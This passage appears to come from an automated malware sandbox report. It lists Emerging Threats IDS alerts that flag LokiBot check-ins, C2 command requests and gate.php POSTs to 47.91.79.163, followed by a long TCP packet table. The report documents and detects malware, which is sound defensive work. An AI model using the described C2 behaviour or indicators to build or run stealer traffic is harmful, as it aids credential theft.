                                    12/03/20-10:04:25.359903TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004480192.168.2.347.91.79.163
                                    12/03/20-10:04:25.359903TCP2025381ET TROJAN LokiBot Checkin5004480192.168.2.347.91.79.163
                                    12/03/20-10:04:25.359903TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004480192.168.2.347.91.79.163
                                    12/03/20-10:04:25.359903TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5004480192.168.2.347.91.79.163
                                    12/03/20-10:04:25.418655TCP2025483ET TROJAN LokiBot Fake 404 Response805004447.91.79.163192.168.2.3
                                    12/03/20-10:04:25.779330TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004580192.168.2.347.91.79.163
                                    12/03/20-10:04:25.779330TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004580192.168.2.347.91.79.163
                                    12/03/20-10:04:25.779330TCP2025381ET TROJAN LokiBot Checkin5004580192.168.2.347.91.79.163
                                    12/03/20-10:04:25.779330TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004580192.168.2.347.91.79.163
                                    12/03/20-10:04:25.779330TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5004580192.168.2.347.91.79.163
                                    12/03/20-10:04:25.837143TCP2025483ET TROJAN LokiBot Fake 404 Response805004547.91.79.163192.168.2.3

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 3, 2020 10:02:28.918229103 CET4970980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:28.935014963 CET804970947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:28.935132980 CET4970980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:28.939497948 CET4970980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:28.956496954 CET804970947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:28.956579924 CET4970980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:28.973191977 CET804970947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.004054070 CET804970947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.004154921 CET4970980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.004210949 CET4970980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.020729065 CET804970947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.273466110 CET4971080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.290147066 CET804971047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.290241003 CET4971080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.293359995 CET4971080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.309967995 CET804971047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.310045958 CET4971080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.326611042 CET804971047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.459626913 CET804971047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.459870100 CET4971080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.459913015 CET4971080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.476507902 CET804971047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.591481924 CET4971180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.608027935 CET804971147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.608103037 CET4971180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.611012936 CET4971180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.627451897 CET804971147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.627510071 CET4971180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.643893003 CET804971147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.858062029 CET804971147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.858131886 CET4971180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.858305931 CET4971180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.874685049 CET804971147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.131704092 CET4971280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.148288965 CET804971247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.149279118 CET4971280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.152512074 CET4971280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.169069052 CET804971247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.171303988 CET4971280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.187849045 CET804971247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.214601994 CET804971247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.216965914 CET4971280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.217003107 CET4971280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.233812094 CET804971247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.756222010 CET4971380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.772880077 CET804971347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.773467064 CET4971380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.776444912 CET4971380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.793056011 CET804971347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.795722008 CET4971380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.812310934 CET804971347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.840723038 CET804971347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.843281031 CET4971380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.843322992 CET4971380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.859853983 CET804971347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.098464012 CET4971480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.114969969 CET804971447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.115086079 CET4971480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.118510962 CET4971480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.135080099 CET804971447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.135189056 CET4971480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.151688099 CET804971447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.264031887 CET804971447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.264178991 CET4971480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.264251947 CET4971480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.281785965 CET804971447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.502340078 CET4971580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.518980980 CET804971547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.519093990 CET4971580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.524698019 CET4971580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.541313887 CET804971547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.541438103 CET4971580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.558002949 CET804971547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.584800959 CET804971547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.584944010 CET4971580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.585079908 CET4971580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.601641893 CET804971547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.807952881 CET4971680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.824553967 CET804971647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.824637890 CET4971680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.827446938 CET4971680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.843971014 CET804971647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.844048977 CET4971680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.860543966 CET804971647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.881911039 CET804971647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.882008076 CET4971680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.882062912 CET4971680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:31.900126934 CET804971647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:32.131494045 CET4971780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.148147106 CET804971747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:32.148253918 CET4971780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.151700974 CET4971780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.168303013 CET804971747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:32.168423891 CET4971780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.184946060 CET804971747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:32.212960958 CET804971747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:32.213109016 CET4971780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.213141918 CET4971780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.229652882 CET804971747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:32.458548069 CET4971880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.485948086 CET804971847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:32.486047983 CET4971880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.492296934 CET4971880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.508912086 CET804971847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:32.509088993 CET4971880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.525696993 CET804971847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:32.556118011 CET804971847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:32.556305885 CET4971880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.556605101 CET4971880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.573268890 CET804971847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:32.745465040 CET4971980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.762104034 CET804971947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:32.762232065 CET4971980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.765127897 CET4971980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.781636000 CET804971947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:32.781712055 CET4971980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.798201084 CET804971947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:32.824419975 CET804971947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:32.824513912 CET4971980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.824558020 CET4971980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:32.841069937 CET804971947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:33.053324938 CET4972080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.069881916 CET804972047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:33.069984913 CET4972080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.073391914 CET4972080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.090538025 CET804972047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:33.090715885 CET4972080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.107218981 CET804972047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:33.145654917 CET804972047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:33.145730972 CET4972080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.145802021 CET4972080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.162256002 CET804972047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:33.372246027 CET4972180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.388926029 CET804972147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:33.389023066 CET4972180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.392092943 CET4972180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.408685923 CET804972147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:33.408750057 CET4972180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.425261974 CET804972147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:33.455180883 CET804972147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:33.455419064 CET4972180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.455452919 CET4972180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.472078085 CET804972147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:33.683304071 CET4972280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.699888945 CET804972247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:33.699986935 CET4972280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.703087091 CET4972280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.719614029 CET804972247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:33.719687939 CET4972280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.736156940 CET804972247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:33.764564991 CET804972247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:33.764689922 CET4972280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.764722109 CET4972280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:33.781212091 CET804972247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:34.036680937 CET4972380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.053201914 CET804972347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:34.053284883 CET4972380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.056226015 CET4972380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.072670937 CET804972347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:34.072757959 CET4972380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.089221001 CET804972347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:34.116974115 CET804972347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:34.117074013 CET4972380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.117096901 CET4972380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.133558035 CET804972347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:34.346314907 CET4972480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.362951040 CET804972447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:34.363050938 CET4972480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.377229929 CET4972480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.393831015 CET804972447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:34.393970013 CET4972480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.410476923 CET804972447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:34.437256098 CET804972447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:34.437333107 CET4972480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.437366962 CET4972480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.453917980 CET804972447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:34.807516098 CET4972580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.824115038 CET804972547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:34.824263096 CET4972580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.827049971 CET4972580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.843575001 CET804972547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:34.843691111 CET4972580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.860177994 CET804972547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:34.971106052 CET804972547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:34.971230984 CET4972580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.971323967 CET4972580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:34.987852097 CET804972547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:35.223557949 CET4972680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:35.240156889 CET804972647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:35.240375996 CET4972680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:35.243072987 CET4972680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:35.259630919 CET804972647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:35.259756088 CET4972680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:35.276252985 CET804972647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:35.402596951 CET804972647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:35.402704954 CET4972680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:35.402760029 CET4972680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:35.419241905 CET804972647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:36.009068966 CET4972780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.025602102 CET804972747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:36.025729895 CET4972780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.028625965 CET4972780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.045197964 CET804972747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:36.045317888 CET4972780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.061851025 CET804972747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:36.086844921 CET804972747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:36.086939096 CET4972780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.086975098 CET4972780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.103503942 CET804972747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:36.293435097 CET4972880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.310046911 CET804972847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:36.310347080 CET4972880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.313062906 CET4972880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.329668999 CET804972847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:36.329809904 CET4972880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.346374989 CET804972847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:36.372262955 CET804972847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:36.372394085 CET4972880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.372428894 CET4972880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.389012098 CET804972847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:36.761456013 CET4972980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.778032064 CET804972947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:36.778145075 CET4972980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.782392025 CET4972980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.798908949 CET804972947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:36.798995972 CET4972980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.815438986 CET804972947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:36.844795942 CET804972947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:36.844999075 CET4972980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.922146082 CET4972980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:36.938678026 CET804972947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:38.563241959 CET4973080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:38.579785109 CET804973047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:38.580092907 CET4973080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:38.586697102 CET4973080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:38.603142023 CET804973047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:38.603267908 CET4973080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:38.619718075 CET804973047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:38.645181894 CET804973047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:38.645258904 CET4973080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:38.645313978 CET4973080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:38.661689043 CET804973047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:38.884723902 CET4973180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:38.901350021 CET804973147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:38.901472092 CET4973180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:38.904767990 CET4973180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:38.921201944 CET804973147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:38.921297073 CET4973180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:38.937721014 CET804973147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:38.965207100 CET804973147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:38.965313911 CET4973180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:38.965354919 CET4973180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:38.981959105 CET804973147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:39.182904005 CET4973480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.199544907 CET804973447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:39.199645042 CET4973480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.202320099 CET4973480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.218847990 CET804973447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:39.218918085 CET4973480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.235456944 CET804973447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:39.261558056 CET804973447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:39.261693001 CET4973480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.261754990 CET4973480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.278523922 CET804973447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:39.517184973 CET4973580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.533802032 CET804973547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:39.533968925 CET4973580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.538012981 CET4973580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.554546118 CET804973547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:39.554655075 CET4973580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.571084023 CET804973547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:39.596359015 CET804973547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:39.596539974 CET4973580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.596565008 CET4973580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.615993977 CET804973547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:39.831638098 CET4973680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.848170042 CET804973647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:39.848326921 CET4973680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.856527090 CET4973680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.873157024 CET804973647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:39.873260021 CET4973680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.889857054 CET804973647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:39.914695024 CET804973647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:39.914875984 CET4973680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.914987087 CET4973680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:39.931442976 CET804973647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:40.148029089 CET4973980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.164661884 CET804973947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:40.164797068 CET4973980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.172331095 CET4973980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.188736916 CET804973947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:40.188839912 CET4973980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.205231905 CET804973947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:40.234574080 CET804973947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:40.234693050 CET4973980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.234759092 CET4973980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.251255989 CET804973947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:40.444881916 CET4974080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.461457968 CET804974047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:40.461546898 CET4974080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.464315891 CET4974080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.480878115 CET804974047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:40.480942011 CET4974080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.497610092 CET804974047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:40.524907112 CET804974047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:40.525031090 CET4974080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.525059938 CET4974080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.541604996 CET804974047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:40.751588106 CET4974280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.768227100 CET804974247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:40.768353939 CET4974280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.771995068 CET4974280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.788527012 CET804974247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:40.788624048 CET4974280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.805175066 CET804974247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:40.829597950 CET804974247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:40.829751015 CET4974280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.829822063 CET4974280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:40.846193075 CET804974247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:41.066194057 CET4974380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:41.082866907 CET804974347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:41.083014965 CET4974380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:41.097711086 CET4974380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:41.114341021 CET804974347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:41.114415884 CET4974380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:41.130997896 CET804974347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:41.155303001 CET804974347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:41.155440092 CET4974380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:41.155467033 CET4974380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:41.172358990 CET804974347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:41.398797035 CET4974480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:41.415457964 CET804974447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:41.415627956 CET4974480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:41.418473959 CET4974480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:41.435121059 CET804974447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:41.435306072 CET4974480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:41.451893091 CET804974447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:41.476969004 CET804974447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:41.477114916 CET4974480192.168.2.347.91.79.163
